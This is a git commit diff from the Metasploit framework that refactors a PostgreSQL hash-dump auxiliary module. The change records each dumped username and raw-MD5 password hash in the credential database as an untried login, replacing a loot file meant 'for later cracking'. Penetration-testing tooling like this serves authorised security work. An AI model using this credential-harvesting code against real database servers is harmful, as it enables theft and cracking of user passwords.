Merge pull request #40 from rapid7/feature/MSP-9748/postgres_hashdump

Feature/msp 9748/postgres hashdump
bug/bundler_fix
jvennix-r7 2014-06-06 10:51:19 -05:00
commit 4bc543715d
1 changed files with 28 additions and 17 deletions

View File

@ -53,12 +53,6 @@ class Metasploit3 < Msf::Auxiliary
print_status("Query appears to have run successfully") print_status("Query appears to have run successfully")
end end
this_service = report_service(
:host => datastore['RHOST'],
:port => datastore['RPORT'],
:name => 'postgres',
:proto => 'tcp'
)
tbl = Rex::Ui::Text::Table.new( tbl = Rex::Ui::Text::Table.new(
'Header' => 'Postgres Server Hashes', 'Header' => 'Postgres Server Hashes',
@ -66,6 +60,22 @@ class Metasploit3 < Msf::Auxiliary
'Columns' => ['Username', 'Hash'] 'Columns' => ['Username', 'Hash']
) )
service_data = {
address: ::Rex::Socket.getaddress(rhost,true),
port: rport,
service_name: 'postgres',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
origin_type: :service,
jtr_format: 'raw-md5',
module_fullname: self.fullname,
private_type: :nonreplayable_hash
}
credential_data.merge!(service_data)
res[:complete].rows.each do |row| res[:complete].rows.each do |row|
@ -73,23 +83,24 @@ class Metasploit3 < Msf::Auxiliary
next if row[0].empty? or row[1].empty? next if row[0].empty? or row[1].empty?
password = row[1] password = row[1]
password.slice!(0,3) password.slice!(0,3)
credential_data[:username] = row[0]
credential_data[:private_data] = password
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
status: Metasploit::Credential::Login::Status::UNTRIED
}
login_data.merge!(service_data)
create_credential_login(login_data)
tbl << [row[0], password] tbl << [row[0], password]
end end
print_good("#{tbl.to_s}") print_good("#{tbl.to_s}")
report_hash(tbl.to_csv,this_service)
end
#Reports the Stolen Hashes back to the Database for later cracking
def report_hash(hashtable,service)
filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_postgreshashes.txt"
path = store_loot("postgres.hashes", "text/plain", datastore['RHOST'], hashtable, filename, "Postgres Hashes",service)
print_status("Hash Table has been saved: #{path}")
end end
end end